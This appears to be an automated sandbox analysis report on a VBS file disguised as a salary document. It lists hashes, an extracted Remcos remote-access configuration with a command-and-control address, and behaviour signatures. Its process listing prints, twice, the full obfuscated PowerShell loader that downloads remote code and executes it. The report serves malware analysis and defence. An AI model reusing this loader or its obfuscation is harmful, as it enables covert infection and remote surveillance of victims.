Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
28-11-2024 06:31
General
-
Target
SalaryRevision_pdf.vbs
-
Size
17KB
-
MD5
5d1c989d603ebfb90ac34748dc83ecfa
-
SHA1
e376e6352049f2f5c67a3fd43d8033c2aeb2a3f4
-
SHA256
6fab653d5e3b00f75cb64d5a58b47ae2c63e50d61795c398ac03a07b39707706
-
SHA512
cbe77570336d7d9c35140607bf3e5cd804c503f3d583f1bd8f9cc855dff432a46799a756d3fb4c1e7539371dabb5c7aa391d5f3f114e0afc502560a9d3fa2fcd
-
SSDEEP
384:ULVKy+9t5Q4LQHsas5E4+atTTkNUPpj+wPOx/fMc34Cj19VVj1BKg:4V5+9t567s7o+R+wWxHMc/nVDBJ
Score
10/10
Malware Config
Extracted
Family
remcos
Botnet
RemoteHost
C2
154.216.18.214:2404
Attributes
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-AOD6MB
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Remcos family
-
Blocklisted process makes network request 5 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SalaryRevision_pdf.vbs"1⤵
- Checks computer location settings
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Dyrtidsregulerende='Vaccinisation';;$sildebenets='Epopees';;$Thiobacilli141='Dicolon';;$Grilleringer='Enwraps';;$skattefinansier='Disemboguing';;$sylespids=$host.Name;function slvbedes($Kofilnaglen){If ($sylespids) {$Overstoring=3} for ($Rdbyeren=$Overstoring;;$Rdbyeren+=4){if(!$Kofilnaglen[$Rdbyeren]) { break }$Peeves+=$Kofilnaglen[$Rdbyeren]}$Peeves}function Mongolide($Ridderskabet){ .($Bengthas) ($Ridderskabet)}$Occamism121=slvbedes ' W N H.eU htUds.UsuWFjeEsambIntC.imlReviFriEC unExcT';$Britannian=slvbedes 'BygMva orecz Voi .olTsel sua Cy/';$Montmorillonitic=slvbedes 'UnaTAdel Cishoo1U n2';$Alterman='Met[samNTu.EImbTslu.Kvassufe oRTelVstaI,rnCMedeLamP unoFroi BiNPa,TBilMPluAE iNPaiaD mg.tte EurFil]Ars: Br:A,nsHi es oc,avUAgerVouiUdbtFejYTekPstoRUnaOLamt,ulOUndcOrnOparL .o=Det$P,iMYdaos,aNsk.tFisM ,no,erR Pai LiLHyplPicoKuknT.rI E,T N i vc';$Britannian+=slvbedes ' st5 Fu.Hyp0Row sli(TosWKi iJ,vno.edBruoEn,w ,hs H. PueNU.iTsem Tes1Bac0 ml. ac0F i; Ce PilW foiCoanEpi6Rat4Ung;L,b MasxRaa6,rr4se ;Men BrrAccvTop:Fab1bud3 Qu1V.n. e 0 r)Zef UeuG ExeCrecFopkAnnoAar/Unk2,li0 sk1 Fi0Ove0spr1ses0sek1Tia DeFFiliLyrrChieAarf A oCapxs b/Far1Cus3Kab1per. my0';$Noncommencement=slvbedes 'svrUtissChaeTanRB r-stra Kag G eBaan P t';$sibyllens=slvbedes 'TrohUhutspat CopOves Br:Ned/sav/ReocarthDes2sotlV nqUku. TiiModcR suReg/tntvAfbZBursCifmBuoKM niDi,C VgOI.d/Aa.VHocnIn,gG oe TorA.rnspreUnf.Tanpst,rVokx';$diskettedrevene=slvbedes 'Ind>';$Bengthas=slvbedes ' s.iDoseBetX';$Portalless='spndingsroman';$smithian='\slingedes.drl';Mongolide (slvbedes ' Pa$ ingAktl .nO omb ibas nLska:U mBOmfL,etyIndG FoLs uaBliN TrsskyeDotNshosHes=Jug$TidE fdNTasV.ol:Dema alPcoaP.efd adasosT suAund+Unp$ Mas,usmateiTelT InhProi muaFa N');Mongolide (slvbedes ' s $CigGAnfl M o E.bTabaT pLBar:DistIn IKonLP pNKomR.niM aEBomd Vae ,as My=.aa$Dens kiPerbMeryPalLbeslse.EUntNLapsU r. fkso,sPNonlT mILovTBro(sem$ drD.deI FrsAnmKAareFagTVikTsameUn dt rr,teED nv abeRepNskeEUds)');Mongolide (slvbedes $Alterman);$sibyllens=$Tilnrmedes[0];$Neapolitanskes=(slvbedes 'Ko $Qu gAn L HaOGesB,anA,isl,ld: nmhA.bePalgAdfel.ynUnas Ka=Te NByze ewsu -ti.o .lbDemJIn EIonC NeTRy. MeasEffyY ws reTBygEscoM Ly. Fa$UndoHaocsnecflya Dem ChI Fis nsMsan1Re 2Mo 1');Mongolide ($Neapolitanskes);Mongolide (slvbedes ' Fr$T.kh O esp,gBrned,kn K.sKlv. RyHU feUgea HodAppeDiark.asRej[ Cr$ R N EsoBalnTodcHido XemWanmUneeKa nIn cNepeHipmKale sknAnetInd]dom=ove$ riBCapr Uni u.tVafaskinDr,nsaliDodaForn');$Overstemme=slvbedes 'Els$ Krh L esnvgPire F nO vs .e.JeoDNatoMicwb knEvel .voUnsa PidhydFNoyiMillInseKam( o$ Fossemisy btruysyclskolVkse R nTons a,Che$ rL stisupnKupeArtaHvirafkl doyDeg)';$Linearly=$Blyglansens;Mongolide (slvbedes 'Hel$Li,gDilLTe.O.nmBEloaR,bLPi :divH alJ kaE Oprda.tCeceRkeG,ruRGlasFo,=E g(BloTReoe vesCo tFam-FejpD.mAshiTOpvh Be Uef$ ndLBreiuncNLunEBruANonrAsoL ekYIll)');while (!$Hjertegrs) {Mongolide (slvbedes 'Int$Celg.erlMesoTiebPolaUptls m: Ins MatLykeRibn.yps Mot iroA rrGarm BeeAn nCoceOp sEpi=Aud$ComAIndfLavl,gou vrBu i DenOctgNo e H r') ;Mongolide $Overstemme;Mongolide (slvbedes 'FjesOvetnora utR Hat Ca- .esstiLGehECoxEskrP a, os4');Mongolide (slvbedes 'Pet$DidgEarLXs OBelBFu as,aLTra: Deh orjGr E.egr unt AcEOr,GPotrstissan=M s(PyrtBeveNedsOstTA,p-ImbP riaDe,tCish At R,$ Bol sti enNHoveAgeaGenrs eLDepY Cu)') ;Mongolide (slvbedes 'Non$Un,gAc,LskioFemBUddABroLUti: CrBMimALipNortkPa.BselOE tk des mEva.N EusHyl=Mar$ otGF nL ,eOAfvbdeoaPhoLL u:Tagb omL PenPisD,erLResYLucGChet areT r+Zoo+ He% Te$ mpTAr.i lilsvmnPunrC umslae ekDKasEEstsDes. DrC b.ODraUnecn ent') ;$sibyllens=$Tilnrmedes[$Bankboksens]}$Deleligt229=322280;$Granulocytopoiesis198=29737;Mongolide (slvbedes 'Lap$HagGWo lMisoorabOvea GalGal:Meta splUvelTanOEm p oaTekT isR .kiEftC r.a TelVgalE.uyHim I y= ar KogGseaEHsttOks-FaxcU ioslunDi t GlEPo N ,iT.in Bry$EpilEl,iLu NF nEskaaNe,RFoxlD tY');Mongolide (slvbedes 'f,l$Kongmall ao,abb toaReplI,c:PreA Zim Rei V n oo tpBraeCynpAg tFrui RedK ea ddsTu eKun sco=.ld s [fa,sCuryJonsHu tTile .omR,s. slC eo rnLeuv roeFesrMult ow]Par:F i:TesFAdmr eloDelmMyxBA taPras K em n6For4 MasFugts vralliRabns ogsoj(b n$m.nAPs lOb.ldksoBoapTegaC rtN,nrReliskec piaKonl alAfsyEk.)');Mongolide (slvbedes 'Exs$HypG FeLsvio .kbRelAObjLEk :Unas enK.rmaUdemD cLOveB umEP orC r s.c= .a Rh[Bess leyGsts P.t hiEBriMCon.Dr,tHa.eEmbXBleTPop.sp.eUndns rc EooPreDKy I flnIn g ma]Trk:sta:Gloa Vis AtcNonITraIBlo.OldGHe.eProt.itsRegT RoROpdiGlsnIs,Gsoc(Thi$In A geMfr I ReN UaOPa PLnmEAfvPFoot spIFordMisA Trss leTit)');Mongolide (slvbedes ' A $sekGJimLW aoAdybPl,aFlolfor: TreLarfZaptp,reUtrRBehk Der A aForv sfs Mab orE oLeksBNedeH.tTFru= ov$ absRevK ,fAs yms rLBagbBasEsilRDeo.spesHaruNerbsu,sAfhTH aRVulI ndnRingGen(Esc$D,edFooePuglsaieKv,LEn.IPseGdektelo2Rou2Ove9Nou,s.v$topG orRIncaKv n ysUEp.ls kONonCGavYUddTUndOpe P Flospii unEspusL,rIBijsFog1 D 9Pha8Pri)');Mongolide $Efterkravsbelbet;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Dyrtidsregulerende='Vaccinisation';;$sildebenets='Epopees';;$Thiobacilli141='Dicolon';;$Grilleringer='Enwraps';;$skattefinansier='Disemboguing';;$sylespids=$host.Name;function slvbedes($Kofilnaglen){If ($sylespids) {$Overstoring=3} for ($Rdbyeren=$Overstoring;;$Rdbyeren+=4){if(!$Kofilnaglen[$Rdbyeren]) { break }$Peeves+=$Kofilnaglen[$Rdbyeren]}$Peeves}function Mongolide($Ridderskabet){ .($Bengthas) ($Ridderskabet)}$Occamism121=slvbedes ' W N H.eU htUds.UsuWFjeEsambIntC.imlReviFriEC unExcT';$Britannian=slvbedes 'BygMva orecz Voi .olTsel sua Cy/';$Montmorillonitic=slvbedes 'UnaTAdel Cishoo1U n2';$Alterman='Met[samNTu.EImbTslu.Kvassufe oRTelVstaI,rnCMedeLamP unoFroi BiNPa,TBilMPluAE iNPaiaD mg.tte EurFil]Ars: Br:A,nsHi es oc,avUAgerVouiUdbtFejYTekPstoRUnaOLamt,ulOUndcOrnOparL .o=Det$P,iMYdaos,aNsk.tFisM ,no,erR Pai LiLHyplPicoKuknT.rI E,T N i vc';$Britannian+=slvbedes ' st5 Fu.Hyp0Row sli(TosWKi iJ,vno.edBruoEn,w ,hs H. PueNU.iTsem Tes1Bac0 ml. ac0F i; Ce PilW foiCoanEpi6Rat4Ung;L,b MasxRaa6,rr4se ;Men BrrAccvTop:Fab1bud3 Qu1V.n. e 0 r)Zef UeuG ExeCrecFopkAnnoAar/Unk2,li0 sk1 Fi0Ove0spr1ses0sek1Tia DeFFiliLyrrChieAarf A oCapxs b/Far1Cus3Kab1per. my0';$Noncommencement=slvbedes 'svrUtissChaeTanRB r-stra Kag G eBaan P t';$sibyllens=slvbedes 'TrohUhutspat CopOves Br:Ned/sav/ReocarthDes2sotlV nqUku. TiiModcR suReg/tntvAfbZBursCifmBuoKM niDi,C VgOI.d/Aa.VHocnIn,gG oe TorA.rnspreUnf.Tanpst,rVokx';$diskettedrevene=slvbedes 'Ind>';$Bengthas=slvbedes ' s.iDoseBetX';$Portalless='spndingsroman';$smithian='\slingedes.drl';Mongolide (slvbedes ' Pa$ ingAktl .nO omb ibas nLska:U mBOmfL,etyIndG FoLs uaBliN TrsskyeDotNshosHes=Jug$TidE fdNTasV.ol:Dema alPcoaP.efd adasosT suAund+Unp$ Mas,usmateiTelT InhProi muaFa N');Mongolide (slvbedes ' s $CigGAnfl M o E.bTabaT pLBar:DistIn IKonLP pNKomR.niM aEBomd Vae ,as My=.aa$Dens kiPerbMeryPalLbeslse.EUntNLapsU r. fkso,sPNonlT mILovTBro(sem$ drD.deI FrsAnmKAareFagTVikTsameUn dt rr,teED nv abeRepNskeEUds)');Mongolide (slvbedes $Alterman);$sibyllens=$Tilnrmedes[0];$Neapolitanskes=(slvbedes 'Ko $Qu gAn L HaOGesB,anA,isl,ld: nmhA.bePalgAdfel.ynUnas Ka=Te NByze ewsu -ti.o .lbDemJIn EIonC NeTRy. MeasEffyY ws reTBygEscoM Ly. Fa$UndoHaocsnecflya Dem ChI Fis nsMsan1Re 2Mo 1');Mongolide ($Neapolitanskes);Mongolide (slvbedes ' Fr$T.kh O esp,gBrned,kn K.sKlv. RyHU feUgea HodAppeDiark.asRej[ Cr$ R N EsoBalnTodcHido XemWanmUneeKa nIn cNepeHipmKale sknAnetInd]dom=ove$ riBCapr Uni u.tVafaskinDr,nsaliDodaForn');$Overstemme=slvbedes 'Els$ Krh L esnvgPire F nO vs .e.JeoDNatoMicwb knEvel .voUnsa PidhydFNoyiMillInseKam( o$ Fossemisy btruysyclskolVkse R nTons a,Che$ rL stisupnKupeArtaHvirafkl doyDeg)';$Linearly=$Blyglansens;Mongolide (slvbedes 'Hel$Li,gDilLTe.O.nmBEloaR,bLPi :divH alJ kaE Oprda.tCeceRkeG,ruRGlasFo,=E g(BloTReoe vesCo tFam-FejpD.mAshiTOpvh Be Uef$ ndLBreiuncNLunEBruANonrAsoL ekYIll)');while (!$Hjertegrs) {Mongolide (slvbedes 'Int$Celg.erlMesoTiebPolaUptls m: Ins MatLykeRibn.yps Mot iroA rrGarm BeeAn nCoceOp sEpi=Aud$ComAIndfLavl,gou vrBu i DenOctgNo e H r') ;Mongolide $Overstemme;Mongolide (slvbedes 'FjesOvetnora utR Hat Ca- .esstiLGehECoxEskrP a, os4');Mongolide (slvbedes 'Pet$DidgEarLXs OBelBFu as,aLTra: Deh orjGr E.egr unt AcEOr,GPotrstissan=M s(PyrtBeveNedsOstTA,p-ImbP riaDe,tCish At R,$ Bol sti enNHoveAgeaGenrs eLDepY Cu)') ;Mongolide (slvbedes 'Non$Un,gAc,LskioFemBUddABroLUti: CrBMimALipNortkPa.BselOE tk des mEva.N EusHyl=Mar$ otGF nL ,eOAfvbdeoaPhoLL u:Tagb omL PenPisD,erLResYLucGChet areT r+Zoo+ He% Te$ mpTAr.i lilsvmnPunrC umslae ekDKasEEstsDes. DrC b.ODraUnecn ent') ;$sibyllens=$Tilnrmedes[$Bankboksens]}$Deleligt229=322280;$Granulocytopoiesis198=29737;Mongolide (slvbedes 'Lap$HagGWo lMisoorabOvea GalGal:Meta splUvelTanOEm p oaTekT isR .kiEftC r.a TelVgalE.uyHim I y= ar KogGseaEHsttOks-FaxcU ioslunDi t GlEPo N ,iT.in Bry$EpilEl,iLu NF nEskaaNe,RFoxlD tY');Mongolide (slvbedes 'f,l$Kongmall ao,abb toaReplI,c:PreA Zim Rei V n oo tpBraeCynpAg tFrui RedK ea ddsTu eKun sco=.ld s [fa,sCuryJonsHu tTile .omR,s. slC eo rnLeuv roeFesrMult ow]Par:F i:TesFAdmr eloDelmMyxBA taPras K em n6For4 MasFugts vralliRabns ogsoj(b n$m.nAPs lOb.ldksoBoapTegaC rtN,nrReliskec piaKonl alAfsyEk.)');Mongolide (slvbedes 'Exs$HypG FeLsvio .kbRelAObjLEk :Unas enK.rmaUdemD cLOveB umEP orC r s.c= .a Rh[Bess leyGsts P.t hiEBriMCon.Dr,tHa.eEmbXBleTPop.sp.eUndns rc EooPreDKy I flnIn g ma]Trk:sta:Gloa Vis AtcNonITraIBlo.OldGHe.eProt.itsRegT RoROpdiGlsnIs,Gsoc(Thi$In A geMfr I ReN UaOPa PLnmEAfvPFoot spIFordMisA Trss leTit)');Mongolide (slvbedes ' A $sekGJimLW aoAdybPl,aFlolfor: TreLarfZaptp,reUtrRBehk Der A aForv sfs Mab orE oLeksBNedeH.tTFru= ov$ absRevK ,fAs yms rLBagbBasEsilRDeo.spesHaruNerbsu,sAfhTH aRVulI ndnRingGen(Esc$D,edFooePuglsaieKv,LEn.IPseGdektelo2Rou2Ove9Nou,s.v$topG orRIncaKv n ysUEp.ls kONonCGavYUddTUndOpe P Flospii unEspusL,rIBijsFog1 D 9Pha8Pri)');Mongolide $Efterkravsbelbet;"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD571444def27770d9071039d005d0323b7
SHA1cef8654e95495786ac9347494f4417819373427e
SHA2568438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
458KB
MD5a1d3a93bddabdbbc3cf313f142230d21
SHA139be7f303d116a32d03e223e57cc2f628c74cf1d
SHA2562d8104c76845810795e0984cacdf707c91e7683f884d2f855053412da4e86235
SHA5128b0d396dc4373d4e3b77d409eacdd26d16e474bb3470e103c1696fd8726d9624879b14983c0d8abc3265c07a2e0533ef48f07e5ee5f6833de2f06fdac87817c1
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
600KB
-
Filesize
15.8MB
-
Filesize
408KB
-
Filesize
3.3MB
-
Filesize
136KB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
6.2MB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
216KB
-
Filesize
408KB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB